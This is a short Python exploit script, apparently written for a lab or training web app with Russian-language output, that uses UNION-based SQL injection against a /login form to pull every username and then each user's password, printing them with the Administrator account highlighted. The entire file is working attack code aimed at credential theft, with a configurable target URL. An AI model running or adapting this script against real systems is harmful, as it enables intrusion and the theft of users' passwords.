#!/usr/bin/env python3
import requests
import re
import argparse

parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.")
parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application")
args = parser.parse_args()

BASE_URL = args.base_url

login_payload = "' UNION SELECT login FROM (Select * from users ORDER BY id)--"
form_data = {"login": login_payload, "password": "' OR 1=1--"}
response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
logins= logins_raw.split("',), ('")


passwords=[]
for login in logins:
    password_payload = f"' UNION SELECT password FROM (Select * from users WHERE login='{login}')--"
    form_data = {"login": password_payload, "password": "' OR 1=1--"}
    response_password = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
    password = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_password.text).group(1)
    passwords.append(password)


if logins and passwords:
    for i, (login, password) in enumerate(zip(logins, passwords)):
        if login == "Administrator":
            print(f"{'*' * 60}")
            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}  <-- !!! ВАЖНО !!!")
            print(f"{'*' * 60}")
        else:
            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
            
else:
    print("Не удалось извлечь данные.")